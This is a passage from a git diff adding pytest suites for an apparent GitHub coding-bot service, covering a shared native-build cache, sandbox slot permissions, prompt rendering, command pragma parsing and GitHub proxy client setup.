ws_node.read_bytes() == b"x" * 1024 + + +def test_gc_clears_stale_staging_dirs(tmp_path: Path) -> None: + cache = _cache(tmp_path) + repo_root = cache.repo_root(REPO) + repo_root.mkdir(parents=True) + stale = repo_root / ".aabb.tmp.99999" + stale.mkdir() + (stale / "leaked").write_text("from a crashed capture") + cache.gc(REPO) + assert not stale.exists() + + +def test_gc_drops_entry_with_missing_manifest(tmp_path: Path) -> None: + cache = _cache(tmp_path) + incomplete = cache.entry_dir(REPO, "bogus") + incomplete.mkdir(parents=True) + (incomplete / "pi_natives.linux-arm64.node").write_bytes(b"x") + cache.gc(REPO) + assert not incomplete.exists() + + +def test_lookup_rejects_incomplete_entry(tmp_path: Path) -> None: + cache = _cache(tmp_path) + entry = cache.entry_dir(REPO, "partial") + entry.mkdir(parents=True) + (entry / "manifest.json").write_text("{}") + # No .node → no hit even though manifest exists. + assert cache.lookup(REPO, "partial") is None + + +# ---- _atomic_link ---- + + +def test_atomic_link_replaces_existing_target(tmp_path: Path) -> None: + src = tmp_path / "src" + src.write_bytes(b"new") + dst = tmp_path / "dst" + dst.write_bytes(b"old") + _atomic_link(src, dst) + assert dst.read_bytes() == b"new" + assert dst.stat().st_ino == src.stat().st_ino diff --git a/python/robomp/tests/test_permissions_e2e.py b/python/robomp/tests/test_permissions_e2e.py new file mode 100644 index 000000000..4b7a43204 --- /dev/null +++ b/python/robomp/tests/test_permissions_e2e.py @@ -0,0 +1,482 @@ +from __future__ import annotations + +import asyncio +import json +import os +import platform +import shutil +import subprocess +import tempfile +from collections.abc import Iterator +from pathlib import Path +from typing import cast + +import pytest + +from robomp import host_tools +from robomp.db import Database +from robomp.github_backend import GitHubBackend +from robomp.github_client import IssueInfo, RepoInfo +from robomp.natives_cache import NativesCache +from robomp.natives_cache import compute_key as natives_compute_key +from robomp.sandbox import LocalGitTransport, SandboxManager, Workspace + +pytestmark = pytest.mark.skipif( + os.environ.get("ROBOMP_PERMISSION_E2E") != "1", + reason="set ROBOMP_PERMISSION_E2E=1 to run slot-permission e2e tests", +) + +_SLOT_ONE = 2001 +_SLOT_TWO = 2002 +_SHARED_OMP_GID = 2000 +_AUTHOR_NAME = "robomp-bot" +_AUTHOR_EMAIL = "robomp-bot@example.invalid" +_REPO = "octo/permission-e2e" + + +def _require_linux_root_toolchain() -> None: + if platform.system() != "Linux" or os.geteuid() != 0: + pytest.skip("slot permission e2e tests require Linux root so subprocesses can drop to omp-N UIDs") + missing = [cmd for cmd in ("git", "bun", "cargo", "python3") if shutil.which(cmd) is None] + if missing: + pytest.skip(f"slot permission e2e tests require tools on PATH: {', '.join(missing)}") + + +def _git(args: list[str], cwd: Path, *, env: dict[str, str] | None = None) -> subprocess.CompletedProcess[str]: + return subprocess.run( + ["git", *args], + cwd=str(cwd), + check=True, + capture_output=True, + text=True, + env=env, + ) + + +def _write_seed_repo(seed: Path) -> None: + (seed / "src").mkdir(parents=True) + (seed / "crates" / "core" / "src").mkdir(parents=True) + (seed / "package.json").write_text( + json.dumps( + { + "name": "permission-e2e", + "private": True, + "type": "module", + "scripts": { + "check": "bun run check:ts && cargo check --workspace", + "check:ts": "biome check src/index.ts", + "fix": "biome check --write --unsafe src/index.ts", + }, + "devDependencies": {"@biomejs/biome": "^2.4.14"}, + }, + indent=2, + ) + + "\n", + encoding="utf-8", + ) + (seed / ".gitignore").write_text("node_modules/\n", encoding="utf-8") + (seed / "src" / "index.ts").write_text("export const answer = 42;\n", encoding="utf-8") + (seed / "Cargo.toml").write_text( + '[workspace]\nmembers = ["crates/core"]\nresolver = "2"\n', + encoding="utf-8", + ) + (seed / "rust-toolchain.toml").write_text( + '[toolchain]\nchannel = "stable"\nprofile = "minimal"\n', + encoding="utf-8", + ) + (seed / "crates" / "core" / "Cargo.toml").write_text( + '[package]\nname = "permission-e2e-core"\nversion = "0.1.0"\nedition = "2021"\n\n[lib]\npath = "src/lib.rs"\n', + encoding="utf-8", + ) + (seed / "crates" / "core" / "src" / "lib.rs").write_text( + "pub fn answer() -> u32 {\n 42\n}\n", + encoding="utf-8", + ) + + +@pytest.fixture +def slot_tmp_path() -> Iterator[Path]: + root = Path(tempfile.mkdtemp(prefix="robomp-permission-e2e-", dir="/tmp")) + root.chmod(0o755) + try: + yield root + finally: + shutil.rmtree(root, ignore_errors=True) + + +def _share_tree_with_slots(path: Path) -> None: + for root, dirs, files in os.walk(path): + root_path = Path(root) + os.chown(root_path, 0, _SHARED_OMP_GID) + root_path.chmod(0o2770) + for dirname in dirs: + child = root_path / dirname + os.chown(child, 0, _SHARED_OMP_GID) + child.chmod(0o2770) + for filename in files: + child = root_path / filename + executable = child.stat().st_mode & 0o111 + os.chown(child, 0, _SHARED_OMP_GID) + child.chmod(0o770 if executable else 0o660) + + +@pytest.fixture +def upstream_repo(slot_tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> Path: + upstream = slot_tmp_path / "upstream.git" + seed = slot_tmp_path / "seed" + seed.mkdir() + _write_seed_repo(seed) + + _git(["init", "--initial-branch=main", "--bare", str(upstream)], cwd=slot_tmp_path) + _git(["init", "--initial-branch=main", str(seed)], cwd=slot_tmp_path) + _git(["-C", str(seed), "add", "."], cwd=slot_tmp_path) + commit_env = os.environ | { + "GIT_AUTHOR_NAME": "seed", + "GIT_AUTHOR_EMAIL": "seed@example.invalid", + "GIT_COMMITTER_NAME": "seed", + "GIT_COMMITTER_EMAIL": "seed@example.invalid", + } + _git(["-C", str(seed), "commit", "-m", "seed"], cwd=slot_tmp_path, env=commit_env) + _git(["-C", str(seed), "remote", "add", "origin", str(upstream)], cwd=slot_tmp_path) + _git(["-C", str(seed), "push", "origin", "main"], cwd=slot_tmp_path) + _share_tree_with_slots(upstream) + git_system_config = slot_tmp_path / "git-system.conf" + _git(["config", "--file", str(git_system_config), "--add", "safe.directory", str(upstream)], cwd=slot_tmp_path) + git_system_config.chmod(0o644) + monkeypatch.setenv("GIT_CONFIG_SYSTEM", str(git_system_config)) + return upstream + + +@pytest.fixture +def tool_loop() -> Iterator[asyncio.AbstractEventLoop]: + loop = asyncio.new_event_loop() + try: + yield loop + finally: + loop.close() + + +def _ensure_workspace( + root: Path, upstream: Path, *, number: int, slot_uid: int, existing_branch: str | None = None +) -> Workspace: + manager = SandboxManager(root, transport=LocalGitTransport(token=None)) + return manager.ensure_workspace( + repo=_REPO, + number=number, + title="permission e2e", + clone_url=str(upstream), + default_branch="main", + existing_branch=existing_branch, + author_name=_AUTHOR_NAME, + author_email=_AUTHOR_EMAIL, + slot_uid=slot_uid, + ) + + +def _bindings( + *, + db: Database, + tool_loop: asyncio.AbstractEventLoop, + workspace: Workspace, + upstream: Path, + slot_uid: int, +) -> host_tools.ToolBindings: + repo = RepoInfo(full_name=_REPO, default_branch="main", clone_url=str(upstream), private=False) + issue = IssueInfo( + repo=_REPO, + number=workspace.issue_number, + title="permission e2e", + body="", + state="open", + author="human", + labels=(), + is_pull_request=False, + ) + return host_tools.ToolBindings( + db=db, + github=cast(GitHubBackend, object()), # not used by these local-only host-tool paths + git_transport=LocalGitTransport(token=None), + repo=repo, + issue=issue, + workspace=workspace, + loop=tool_loop, + author_name=_AUTHOR_NAME, + author_email=_AUTHOR_EMAIL, + slot_uid=slot_uid, + ) + + +def _run_ok( + bindings: host_tools.ToolBindings, + cmd: list[str] | tuple[str, ...], + *, + timeout: float = 180.0, +) -> subprocess.CompletedProcess[str]: + proc = host_tools._run_repo_command(bindings, cmd, timeout=timeout) + assert proc.returncode == 0, ( + f"command failed as slot {bindings.slot_uid}: {' '.join(cmd)}\nstdout:\n{proc.stdout}\nstderr:\n{proc.stderr}" + ) + return proc + + +def _write_as_slot(bindings: host_tools.ToolBindings, relative_path: str, content: str) -> None: + _run_ok( + bindings, + [ + "python3", + "-c", + ( + "from pathlib import Path; " + "Path(__import__('sys').argv[1]).parent.mkdir(parents=True, exist_ok=True); " + "Path(__import__('sys').argv[1]).write_text(__import__('sys').argv[2], encoding='utf-8')" + ), + relative_path, + content, + ], + ) + + +def _prepare_shared_cargo_cache(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> Path: + cargo_home = tmp_path / "shared-cache" / "cargo" + cargo_target = tmp_path / "shared-cache" / "cargo-target" + for path in (cargo_home, cargo_target): + path.mkdir(parents=True) + os.chown(path, 0, _SHARED_OMP_GID) + path.chmod(0o2770) + monkeypatch.setenv("CARGO_HOME", str(cargo_home)) + monkeypatch.setenv("CARGO_TARGET_DIR", str(cargo_target)) + return cargo_target + + +def test_slot_workspace_runs_bun_biome_cargo_and_git_after_root_reentry( + slot_tmp_path: Path, + upstream_repo: Path, + db: Database, + tool_loop: asyncio.AbstractEventLoop, + monkeypatch: pytest.MonkeyPatch, +) -> None: + _require_linux_root_toolchain() + cargo_target = _prepare_shared_cargo_cache(slot_tmp_path, monkeypatch) + workspaces = slot_tmp_path / "workspaces" + + first = _ensure_workspace(workspaces, upstream_repo, number=101, slot_uid=_SLOT_ONE) + stale_bun_cache = first.root / ".omp-xdg" / "cache" / "bun-install" / "root-owned-stale" + stale_bun_cache.mkdir(parents=True, exist_ok=True) + stale_marker = stale_bun_cache / "marker.txt" + stale_marker.write_text("root-owned\n", encoding="utf-8") + stale_bun_cache.chmod(0o700) + stale_marker.chmod(0o600) + + workspace = _ensure_workspace( + workspaces, + upstream_repo, + number=101, + slot_uid=_SLOT_ONE, + existing_branch=first.branch, + ) + bindings = _bindings(db=db, tool_loop=tool_loop, workspace=workspace, upstream=upstream_repo, slot_uid=_SLOT_ONE) + + _run_ok(bindings, ["bun", "install", "--no-progress"], timeout=300.0) + _run_ok(bindings, ["bun", "run", "check:ts"], timeout=180.0) + _run_ok(bindings, ["cargo", "check", "--workspace"], timeout=600.0) + host_tools._run_pre_publish_bun_check(bindings, {}, tool_name="gh_push_branch", stage="push") + + runtime_env = host_tools._repo_command_env(bindings) + bun_cache = Path(runtime_env["BUN_INSTALL_CACHE_DIR"]) + assert bun_cache.is_dir() + assert bun_cache.stat().st_uid == _SLOT_ONE + assert stale_marker.stat().st_uid == _SLOT_ONE + assert (cargo_target / "debug").is_dir() + assert (cargo_target / "debug").stat().st_gid == _SHARED_OMP_GID + + _write_as_slot(bindings, "src/slot-generated.ts", "export const generatedBySlot = true;\n") + _run_ok(bindings, ["git", "add", "src/slot-generated.ts", "Cargo.lock", "bun.lock"]) + _run_ok(bindings, ["git", "commit", "-m", "slot generated file"]) + status = _run_ok(bindings, ["git", "status", "--porcelain", "--untracked-files=normal"]) + assert status.stdout.strip() == "" + + +def test_git_pool_metadata_survives_root_push_and_retry_slot( + slot_tmp_path: Path, + upstream_repo: Path, + db: Database, + tool_loop: asyncio.AbstractEventLoop, +) -> None: + _require_linux_root_toolchain() + workspaces = slot_tmp_path / "workspaces" + + first = _ensure_workspace(workspaces, upstream_repo, number=102, slot_uid=_SLOT_ONE) + first_bindings = _bindings(db=db, tool_loop=tool_loop, workspace=first, upstream=upstream_repo, slot_uid=_SLOT_ONE) + _write_as_slot(first_bindings, "src/first-slot.ts", "export const firstSlot = 1;\n") + _run_ok(first_bindings, ["git", "add", "src/first-slot.ts"]) + _run_ok(first_bindings, ["git", "commit", "-m", "first slot commit"]) + + first_head = host_tools._guarded_push_branch(first_bindings, {}, "gh_push_branch", first.branch) + remote_head = _git(["--git-dir", str(upstream_repo), "rev-parse", first.branch], cwd=slot_tmp_path).stdout.strip() + assert remote_head == first_head + + retry = _ensure_workspace( + workspaces, + upstream_repo, + number=102, + slot_uid=_SLOT_TWO, + existing_branch=first.branch, + ) + retry_bindings = _bindings(db=db, tool_loop=tool_loop, workspace=retry, upstream=upstream_repo, slot_uid=_SLOT_TWO) + + _run_ok(retry_bindings, ["git", "fsck", "--no-progress"], timeout=180.0) + _write_as_slot(retry_bindings, "src/retry-slot.ts", "export const retrySlot = 2;\n") + _run_ok(retry_bindings, ["git", "add", "src/retry-slot.ts"]) + _run_ok(retry_bindings, ["git", "commit", "-m", "retry slot commit"]) + + retry_head = host_tools._guarded_push_branch(retry_bindings, {}, "gh_push_branch", retry.branch) + remote_retry_head = _git( + ["--git-dir", str(upstream_repo), "rev-parse", retry.branch], cwd=slot_tmp_path + ).stdout.strip() + assert remote_retry_head == retry_head + assert retry_head != first_head + + +def _prepare_shared_natives_cache(slot_tmp_path: Path) -> NativesCache: + """Provision `/data/cache/pi-natives` shape (root:omp, setgid 2770).""" + cache_root = slot_tmp_path / "cache" / "pi-natives" + cache_root.mkdir(parents=True) + os.chown(cache_root, 0, _SHARED_OMP_GID) + cache_root.chmod(0o2770) + return NativesCache(cache_root) + + +def _stage_built_natives(bindings: host_tools.ToolBindings, *, body: str = "ELFx") -> None: + """Mirror what a napi build would leave in `packages/natives/native/`. + + Writes the four cached files AS THE SLOT so ownership matches a real + post-build workspace; capture pulls these into the cache. + """ + _write_as_slot(bindings, "packages/natives/native/pi_natives.linux-arm64.node", body) + _write_as_slot(bindings, "packages/natives/native/index.d.ts", "export const X: number;\n") + _write_as_slot(bindings, "packages/natives/native/index.js", "export const X = 1;\n") + _write_as_slot( + bindings, + "packages/natives/native/embedded-addon.js", + "export const embeddedAddon = null;\n", + ) + + +def test_natives_cache_shares_artifacts_across_slot_workspaces( + slot_tmp_path: Path, + upstream_repo: Path, + db: Database, + tool_loop: asyncio.AbstractEventLoop, +) -> None: + """End-to-end: capture under slot 1, populate under slot 2, prove that: + + 1. A capture from a slot-owned workspace lands in the shared cache with + group `omp` setgid inheritance so any other slot can read it. + 2. ensure_workspace under a different slot UID auto-populates the cached + `.node` (hardlink, inode shared) and copies the companions. + 3. Slot 2 can read the populated `.node`, and a temp-rename rebuild + (mirroring napi's `installBinary`) leaves the cache entry intact. + 4. An in-place truncate-rewrite of a companion (mirroring `gen-enums.ts` + / `installGeneratedBindings`) does NOT mutate the cached companion — + this is exactly why companions are copied, not hardlinked. + """ + _require_linux_root_toolchain() + workspaces = slot_tmp_path / "workspaces" + natives_cache = _prepare_shared_natives_cache(slot_tmp_path) + manager = SandboxManager( + workspaces, + transport=LocalGitTransport(token=None), + natives_cache=natives_cache, + ) + + # --- Workspace 1: stage built artifacts and capture them as the orchestrator. --- + ws1 = manager.ensure_workspace( + repo=_REPO, + number=301, + title="natives cache producer", + clone_url=str(upstream_repo), + default_branch="main", + author_name=_AUTHOR_NAME, + author_email=_AUTHOR_EMAIL, + slot_uid=_SLOT_ONE, + ) + bindings1 = _bindings(db=db, tool_loop=tool_loop, workspace=ws1, upstream=upstream_repo, slot_uid=_SLOT_ONE) + _stage_built_natives(bindings1, body="ELFx-original") + + key = natives_compute_key(ws1.repo_dir, target="linux-arm64") + native_dir1 = ws1.repo_dir / "packages" / "natives" / "native" + stored = natives_cache.capture(_REPO, key, native_dir1, source_workspace=ws1.workspace_key) + assert stored is not None + cached_node = stored / "pi_natives.linux-arm64.node" + cached_companion = stored / "index.d.ts" + # Cache root is setgid `omp`; new files inherit gid `omp` so any slot + # with `extra_groups=[omp]` can read them. + assert cached_node.stat().st_gid == _SHARED_OMP_GID + assert cached_companion.stat().st_gid == _SHARED_OMP_GID + + # --- Workspace 2: a different slot UID gets auto-populated on ensure. --- + ws2 = manager.ensure_workspace( + repo=_REPO, + number=302, + title="natives cache consumer", + clone_url=str(upstream_repo), + default_branch="main", + author_name=_AUTHOR_NAME, + author_email=_AUTHOR_EMAIL, + slot_uid=_SLOT_TWO, + ) + bindings2 = _bindings(db=db, tool_loop=tool_loop, workspace=ws2, upstream=upstream_repo, slot_uid=_SLOT_TWO) + native_dir2 = ws2.repo_dir / "packages" / "natives" / "native" + ws2_node = native_dir2 / "pi_natives.linux-arm64.node" + ws2_companion = native_dir2 / "index.d.ts" + assert ws2_node.exists(), "auto-populate must hardlink the .node into ws2" + assert ws2_companion.exists(), "auto-populate must copy companions into ws2" + + # The .node is hardlinked: same inode, nlink ≥ 2. + assert ws2_node.stat().st_ino == cached_node.stat().st_ino + assert cached_node.stat().st_nlink >= 2 + # The companion is COPIED: independent inode. + assert ws2_companion.stat().st_ino != cached_companion.stat().st_ino + + # Slot 2 must be able to read the populated artifacts (group omp + 0660 + # via setgid inheritance from the cache root). + _run_ok(bindings2, ["test", "-r", "packages/natives/native/pi_natives.linux-arm64.node"]) + _run_ok(bindings2, ["test", "-r", "packages/natives/native/index.d.ts"]) + + # --- Rebuild simulation: napi's installBinary does temp + rename. --- + # Mirrors `fs.copyFile(src, tempPath); fs.rename(tempPath, dest)`. + _run_ok( + bindings2, + [ + "python3", + "-c", + ( + "import os, sys; " + "dest = sys.argv[1]; " + "tmp = dest + '.tmp.rebuild'; " + "open(tmp, 'wb').write(b'REBUILT'); " + "os.rename(tmp, dest)" + ), + "packages/natives/native/pi_natives.linux-arm64.node", + ], + ) + # Workspace sees the rebuilt bytes; cache is untouched (new inode in ws). + assert ws2_node.read_bytes() == b"REBUILT" + assert cached_node.read_bytes() == b"ELFx-original" + assert ws2_node.stat().st_ino != cached_node.stat().st_ino + + # --- Companion-rewrite simulation: gen-enums.ts open-truncate-writes. --- + # Mirrors `await Bun.write(jsPath, js)` / Python `Path.write_text`. + _write_as_slot( + bindings2, + "packages/natives/native/index.d.ts", + "// regenerated by gen-enums\n", + ) + assert ws2_companion.read_text() == "// regenerated by gen-enums\n" + # Cache copy stays at its original content — copies absorbed the rewrite. + assert cached_companion.read_text() == "export const X: number;\n" + + # --- Recapture from ws2 (different key now — but same key here since + # tree didn't change) is idempotent under the flock. --- + again = natives_cache.capture(_REPO, key, native_dir2, source_workspace=ws2.workspace_key) + assert again is not None and again == stored, "second capture must reuse the same entry" diff --git a/python/robomp/tests/test_persona.py b/python/robomp/tests/test_persona.py new file mode 100644 index 000000000..b6bef08e6 --- /dev/null +++ b/python/robomp/tests/test_persona.py @@ -0,0 +1,132 @@ +"""Coverage for the directive prompt assembly.""" + +from __future__ import annotations + +from dataclasses import dataclass + +from robomp import persona +from robomp.worker import DirectiveInfo, ThreadMessage + + +@dataclass(slots=True, frozen=True) +class _Repo: + full_name: str = "octo/widget" + default_branch: str = "main" + clone_url: str = "" + private: bool = False + + +@dataclass(slots=True, frozen=True) +class _Issue: + repo: str = "octo/widget" + number: int = 1080 + title: str = "broken thing" + body: str = "the body text" + state: str = "open" + author: str = "alice" + labels: tuple[str, ...] = () + is_pull_request: bool = False + + +@dataclass(slots=True, frozen=True) +class _Workspace: + branch: str = "farm/abc/test" + session_dir: str = "/tmp/session" + context_dir: str = "/tmp/ctx" + repo_dir: str = "/tmp/repo" + + +@dataclass(slots=True, frozen=True) +class _Comment: + id: int = 1 + author: str = "can1357" + body: str = "@roboomp please fix" + created_at: str = "2026-05-14T20:00:00Z" + + +def test_render_thread_empty_yields_placeholder() -> None: + assert persona._render_thread(()).startswith("(no prior") + + +def test_render_thread_orders_kinds_with_appropriate_headers() -> None: + thread = ( + ThreadMessage(kind="issue_body", author="alice", body="orig report", created_at=""), + ThreadMessage(kind="comment", author="bob", body="me too", created_at="2026-05-01T10:00:00Z"), + ThreadMessage( + kind="review_comment", + author="codex", + body="leak here", + created_at="2026-05-02T10:00:00Z", + path="src/foo.py", + line=42, + ), + ThreadMessage( + kind="review", + author="codex", + body="two issues", + created_at="2026-05-02T10:01:00Z", + state="CHANGES_REQUESTED", + ), + ) + out = persona._render_thread(thread) + # Issue body header (no timestamp). + assert "### @alice — issue body" in out + assert "orig report" in out + # Comment header with timestamp. + assert "### @bob — comment *(2026-05-01T10:00:00Z)*" in out + assert "me too" in out + # Review comment with file:line anchor. + assert "### @codex — review comment on `src/foo.py`:L42" in out + assert "leak here" in out + # Review with state badge. + assert "### @codex — review (CHANGES_REQUESTED)" in out + assert "two issues" in out + + +def test_directive_prompt_embeds_thread_and_directive_body() -> None: + thread = ( + ThreadMessage(kind="comment", author="alice", body="follow up please", created_at="2026-05-01T10:00:00Z"), + ) + out = persona.directive( + repo=_Repo(), + issue=_Issue(), + comment=_Comment(), + workspace=_Workspace(), + directive=DirectiveInfo(body="apply fix Y", author="can1357", thread=thread), + pr_status="PR #1080 is open", + ) + assert "Directive on octo/widget#1080" in out + assert "@can1357" in out + assert "apply fix Y" in out + assert "follow up please" in out + assert "PR #1080 is open" in out + + +def test_kickoff_directive_prompt_embeds_thread_and_classify_instruction() -> None: + thread = (ThreadMessage(kind="issue_body", author="alice", body="failing on macos", created_at=""),) + out = persona.kickoff_directive( + repo=_Repo(), + issue=_Issue(), + workspace=_Workspace(), + directive=DirectiveInfo(body="reproduce + fix", author="can1357", thread=thread), + ) + assert "Maintainer directive on octo/widget#1080" in out + assert "failing on macos" in out + assert "reproduce + fix" in out + # The kickoff variant must still tell the agent to classify first. + assert "Classify first" in out + + +def test_resume_triage_renders_branch_and_issue() -> None: + out = persona.resume_triage( + repo=_Repo(), + issue=_Issue(), + workspace=_Workspace(), + ) + # Working branch surfaces literally so the agent sees what it's on. + assert "farm/abc/test" in out + # Issue identity surfaces with the title. + assert "octo/widget#1080" in out + assert "broken thing" in out + # The prompt instructs the agent to reconcile drift via fetch_issue_thread. + assert "fetch_issue_thread" in out diff --git a/python/robomp/tests/test_pragmas.py b/python/robomp/tests/test_pragmas.py new file mode 100644 index 000000000..71ce47abe --- /dev/null +++ b/python/robomp/tests/test_pragmas.py @@ -0,0 +1,147 @@ +from __future__ import annotations + +from robomp.pragmas import ( + parse_pragmas, + pragma_value, + resolve_model_alias, + resolve_thinking_level, +) + + +def test_parse_single_inline_command() -> None: + body = "/model gpt\nfix the off-by-one in foo()" + cleaned, pragmas = parse_pragmas(body) + assert cleaned == "fix the off-by-one in foo()" + assert pragmas == (("model", "gpt"),) + + +def test_parse_multiple_commands_on_one_line() -> None: + body = "/model gpt /thinking low\nrun" + cleaned, pragmas = parse_pragmas(body) + assert cleaned == "run" + assert pragmas == (("model", "gpt"), ("thinking", "low")) + + +def test_parse_stacked_commands() -> None: + body = "/model gpt\n/thinking low\nrun" + cleaned, pragmas = parse_pragmas(body) + assert cleaned == "run" + assert pragmas == (("model", "gpt"), ("thinking", "low")) + + +def test_parse_equals_form() -> None: + body = "/model=gpt /thinking=low\nrun" + cleaned, pragmas = parse_pragmas(body) + assert cleaned == "run" + assert pragmas == (("model", "gpt"), ("thinking", "low")) + + +def test_parse_indented_command_line() -> None: + body = " /model gpt\nrun" + cleaned, pragmas = parse_pragmas(body) + assert cleaned == "run" + assert pragmas == (("model", "gpt"),) + + +def test_mixed_line_is_not_consumed() -> None: + # Trailing prose after a command is part of the line — keep the line. + body = "/model gpt fix the bug" + cleaned, pragmas = parse_pragmas(body) + assert cleaned == "/model gpt fix the bug" + assert pragmas == () + + +def test_path_references_are_not_consumed() -> None: + body = "/src/foo.py:42 is the offender\n/model gpt\nfix it" + cleaned, pragmas = parse_pragmas(body) + assert cleaned == "/src/foo.py:42 is the offender\nfix it" + assert pragmas == (("model", "gpt"),) + + +def test_command_without_value_is_not_consumed() -> None: + body = "/model\nrun" + cleaned, pragmas = parse_pragmas(body) + assert cleaned == "/model\nrun" + assert pragmas == () + + +def test_dangling_command_aborts_whole_line() -> None: + # `/model gpt /thinking` — second command has no value, so the WHOLE line + # is left untouched (atomic per-line consumption). + body = "/model gpt /thinking\nrun" + cleaned, pragmas = parse_pragmas(body) + assert cleaned == "/model gpt /thinking\nrun" + assert pragmas == () + + +def test_preserves_interior_blank_lines_after_strip() -> None: + body = "/model gpt\n\nbody one\n\nbody two" + cleaned, pragmas = parse_pragmas(body) + assert cleaned == "body one\n\nbody two" + assert pragmas == (("model", "gpt"),) + + +def test_empty_body() -> None: + cleaned, pragmas = parse_pragmas("") + assert cleaned == "" + assert pragmas == () + + +def test_key_case_normalized_value_preserved() -> None: + body = "/MODEL GPT-5.5\nrun" + cleaned, pragmas = parse_pragmas(body) + assert cleaned == "run" + assert pragmas == (("model", "GPT-5.5"),) + + +def test_pragma_value_last_wins() -> None: + assert pragma_value((("model", "a"), ("model", "b")), "model") == "b" + assert pragma_value((("model", "a"),), "MODEL") == "a" + assert pragma_value((), "model") is None + + +def test_resolve_model_alias_precedence() -> None: + pool = ("anthropic/claude-sonnet-4-6", "openai/gpt-5.5", "openai/gpt-5.5-mini") + # Short-name-after-slash beats substring. + assert resolve_model_alias("gpt-5.5", pool) == "openai/gpt-5.5" + # Substring is fallback. + assert resolve_model_alias("gpt", pool) == "openai/gpt-5.5" + assert resolve_model_alias("claude", pool) == "anthropic/claude-sonnet-4-6" + + +def test_resolve_model_alias_full_id() -> None: + pool = ("openai/gpt-5.5", "anthropic/claude-sonnet-4-6") + assert resolve_model_alias("openai/gpt-5.5", pool) == "openai/gpt-5.5" + + +def test_resolve_model_alias_no_match() -> None: + pool = ("anthropic/claude-sonnet-4-6",) + assert resolve_model_alias("gpt", pool) is None + assert resolve_model_alias("", pool) is None + + +def test_resolve_thinking_level_aliases() -> None: + # Spec from the user: xhi|xhigh|hi|high|med|medium|lo|low|none|off|no. + assert resolve_thinking_level("off") == "off" + assert resolve_thinking_level("none") == "off" + assert resolve_thinking_level("no") == "off" + assert resolve_thinking_level("lo") == "low" + assert resolve_thinking_level("low") == "low" + assert resolve_thinking_level("med") == "medium" + assert resolve_thinking_level("medium") == "medium" + assert resolve_thinking_level("hi") == "high" + assert resolve_thinking_level("high") == "high" + assert resolve_thinking_level("xhi") == "xhigh" + assert resolve_thinking_level("xhigh") == "xhigh" + + +def test_resolve_thinking_level_case_insensitive() -> None: + assert resolve_thinking_level("HIGH") == "high" + assert resolve_thinking_level(" Hi ") == "high" + assert resolve_thinking_level("XHi") == "xhigh" + + +def test_resolve_thinking_level_rejects_unknown() -> None: + assert resolve_thinking_level("ultra") is None + assert resolve_thinking_level("") is None + assert resolve_thinking_level("minimal") is None diff --git a/python/robomp/tests/test_proxy_client.py b/python/robomp/tests/test_proxy_client.py new file mode 100644 index 000000000..62e3e1516 --- /dev/null +++ b/python/robomp/tests/test_proxy_client.py @@ -0,0 +1,566 @@ +"""Coverage for `GitHubProxyClient` + `ProxyGitTransport` against an +ASGI-wrapped proxy app and a hand-rolled `httpx.MockTransport`.""" + +from __future__ import annotations + +import asyncio +import json +import os +import subprocess +from collections.abc import Callable +from pathlib import Path + +import httpx +import pytest +from pydantic import SecretStr + +from robomp.config import Settings +from robomp.git_ops import HeadDriftError +from robomp.github_client import ( + CommentInfo, + GitHubClient, + GitHubError, + IssueInfo, + IssueSummary, + PullRequestInfo, + PullRequestReviewInfo, + ReactionInfo, + RepoInfo, + ReviewCommentInfo, +) +from robomp.proxy.server import create_proxy_app +from robomp.proxy_client import GitHubProxyClient, ProxyGitTransport +from robomp.proxy_hmac import HEADER_SIGNATURE, HEADER_TIMESTAMP, verify +from robomp.sandbox import workspace_key + +_HMAC = "test-hmac-key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" +_HMAC_BYTES = _HMAC.encode("utf-8") +_TOKEN = "ghp_test_token_value" + + +# ---------- shared helpers ---------- + + +def _build_settings(tmp_path: Path) -> Settings: + cfg = Settings.model_construct( + github_token=SecretStr(_TOKEN), + github_webhook_secret=SecretStr("webhook-secret"), + bot_login="robomp-bot", + git_author_email="robomp-bot@example.invalid", + repo_allowlist_raw="octo/widget", + gh_proxy_url=None, + gh_proxy_hmac_key=SecretStr(_HMAC), + gh_proxy_bind_host="0.0.0.0", + gh_proxy_bind_port=8081, + workspace_root=tmp_path / "workspaces", + sqlite_path=tmp_path / "robomp.sqlite", + log_dir=tmp_path / "logs", + ) + cfg.ensure_paths() + return cfg + + +@pytest.fixture +def proxy_settings(tmp_path: Path) -> Settings: + return _build_settings(tmp_path) + + +def _git(args: list[str], cwd: Path) -> subprocess.CompletedProcess[str]: + return subprocess.run( + ["git", *args], + cwd=str(cwd), + check=True, + capture_output=True, + text=True, + env=os.environ + | { + "GIT_AUTHOR_NAME": "t", + "GIT_AUTHOR_EMAIL": "t@t", + "GIT_COMMITTER_NAME": "t", + "GIT_COMMITTER_EMAIL": "t@t", + }, + ) + + +@pytest.fixture +def upstream_repo(tmp_path: Path) -> Path: + repo = tmp_path / "upstream.git" + repo.mkdir() + _git(["init", "--initial-branch=main", "--bare", str(repo)], tmp_path) + seed = tmp_path / "seed" + seed.mkdir() + _git(["init", "--initial-branch=main", str(seed)], tmp_path) + (seed / "README.md").write_text("hello\n", encoding="utf-8") + _git(["-C", str(seed), "add", "."], tmp_path) + _git(["-C", str(seed), "commit", "-m", "init"], tmp_path) + _git(["-C", str(seed), "remote", "add", "origin", str(repo)], tmp_path) + _git(["-C", str(seed), "push", "origin", "main"], tmp_path) + return repo + + +def _stage_workspace(cfg: Settings, upstream: Path, repo: str, number: int, branch: str) -> tuple[Path, str]: + ws_dir = Path(cfg.workspace_root) / workspace_key(repo, number) + ws_dir.mkdir(parents=True, exist_ok=True) + repo_dir = ws_dir / "repo" + _git(["clone", str(upstream), str(repo_dir)], ws_dir) + _git(["-C", str(repo_dir), "config", "user.email", "t@t"], ws_dir) + _git(["-C", str(repo_dir), "config", "user.name", "t"], ws_dir) + _git(["-C", str(repo_dir), "checkout", "-b", branch], ws_dir) + (repo_dir / "x.txt").write_text("x", encoding="utf-8") + _git(["-C", str(repo_dir), "add", "."], ws_dir) + _git(["-C", str(repo_dir), "commit", "-m", "x"], ws_dir) + proc = _git(["-C", str(repo_dir), "rev-parse", "HEAD"], ws_dir) + return repo_dir, proc.stdout.strip() + + +def _bare_has_branch(bare: Path, branch: str) -> bool: + proc = subprocess.run( + ["git", "-C", str(bare), "branch", "--list", branch], + capture_output=True, + text=True, + check=False, + ) + return bool(proc.stdout.strip()) + + +def _attach_gh(app, handler: Callable[[httpx.Request], httpx.Response]) -> None: + app.state.github = GitHubClient(_TOKEN, transport=httpx.MockTransport(handler)) + + +# Sync httpx.Client cannot accept 